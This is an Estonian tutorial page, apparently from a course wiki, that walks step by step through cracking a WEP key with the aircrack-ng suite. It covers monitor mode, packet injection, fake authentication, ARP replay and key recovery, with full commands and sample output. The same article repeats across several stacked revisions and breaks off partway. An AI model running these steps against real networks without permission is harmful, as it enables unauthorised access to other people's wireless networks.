Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:50:15Z

Ktragel: /* Lühikesed tegevussammud */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode

]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:48:50Z

Ktragel: /* Eesmärk */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

